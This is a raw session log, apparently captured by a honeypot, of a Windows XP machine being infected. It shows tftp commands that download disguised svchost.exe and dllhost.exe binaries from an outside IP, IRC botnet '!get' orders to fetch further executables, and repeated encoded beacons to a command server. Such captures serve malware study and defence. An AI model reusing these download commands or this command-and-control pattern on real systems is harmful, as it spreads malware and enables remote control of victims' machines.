Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 70.165.19.238 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	tftp -i 70.165.19.238 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29456 bytes in 11 seconds, 2677 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	tftp -i 70.165.19.238 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 8 seconds, 2496 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK ztdmffthUSER c020501 . . :- 
VICTIM:  	JOIN &virtu 
ATTACKER:	:u. PRIVMSG ztdmffth :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe:u. PRIVMSG ztdmffth :!get http:/nonetnet.com/kx4.txt 
VICTIM:  	GET /kx4.txt HTTP/1.0User-Agent: DownloadHost: nonetnet.comPragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2869C1DC99CA9E5FF6F6CDDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.4882318 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: mewgost.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p/goo.exe?t=0.8900873 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: nonetnet.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=E8F68A6E56C6CB1E0F13CEE49FD3EA29009E4B2D7724BE23B180F3BA8F2183A57C35849243297658BB87C4B6CCF339DF95590BB7B729785A177203AB963FCDBE87C8ACD0F5F4E17EF5CFA3D9907ED40B12E5A39EC2BCE0E645E74C2141A839BCFC98233E0914379840F3DB5C9696B62C8D7AD2FD5611BD9AE0B9DFB05EE85FE1111A4BE25C68DF6063591D4E&t=0.8389398 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: mewgost.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=66782CC858C8499C4A563B113F7397549608F89E623163FED2E3A1E896387F599ED71F09AEC4BD938EB28CFEF1CE9C7A39F5F24ECA54280A8DE856FEC26B1B68652AF589ACAD48D75E64CDB71FF13AE5E6115F622A54181E9537B4D942ABCB4EC1A59E837F6263CC4DFE40D608F1B73FC134D08ECC9F4C7EA0B49CE974D67983F5E54BED95B8C80B3003663229E09EE230D1&t=0.3039057 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: mewgost.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	GET /1.exe?t=0.9981806 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 193.218.156.90Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=8997CF2BDF4FB51211E197A7A6DD4783ED4D91F95073C1574F763547439888A25F171EF282EC1F7EDDEA196B7449E20907F17C97E745F8DFBD85B9C5542983EFE39C329465BD1986073D4F35B45A78A743B4CEF3D6A8757365C75B36987136B34E2A617C8895A10E982B1F98B8B8148E7B8CFED1BEF85770F2AB224DFF49CF71191F3F982E1FF430DAEEAEF90FC60478&t=0.6162836 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: mewgost.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /images/3418.exe?t=0.9366571 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: 78.41.203.201Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=7D63A84C8B1B21894CA0F9D39AD32AEFD070CDA540631681B3D6733A9B3D5C721B56CE2A142B91CDD9B3B6DC353BEA06E31A9B2DBAD4FDDE05336B1EEA6AC75AD3ADB6C5282BF36CE2D8106AC52B598638CFB8851866C6C000A2761BD138FB7E82E6CAD78A97F85753E042C59F9F7AE0C93E2C034007C2E5B2EB6D02C47298264640B1164072902F5963C595599F8CF2&t=0.5385248 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: mewgost.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=2E3010F49D0DC860866A81AB1E570ECB9939D2BACBE868FFA7C296DFFC5A9FB1E3AE7C98B18E83DF6F05771D27292EC2877E1DABA9C78DAEFCCA4D38A9291B86E59B15660F0CF06F91ABD3A9D13FFB24C0379AA7C4BA8C8A12B0D7BAB1581590BFDB3429ACB1319E893ABC2AA158E56DEF1A401E30632614A4B0FA8FBB199C663F2F71DABD93A619340C9CC45D9A9E1F03E1&t=0.4465601 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.2600.0000; Windows NT 5.1.2600)Host: mewgost.comConnection: Keep-AlivePragma: no-cache 
VICTIM:  	POST /+30103.html HTTP/1.1Accept: */*Accept-Language: en-usCB2: 1Accept-Encoding: gzip, deflateUser-Agent: MozillaHost: 87.120.166.58Connection: Keep-Alive 
VICTIM:  	HTTP/1.0 200 OKYES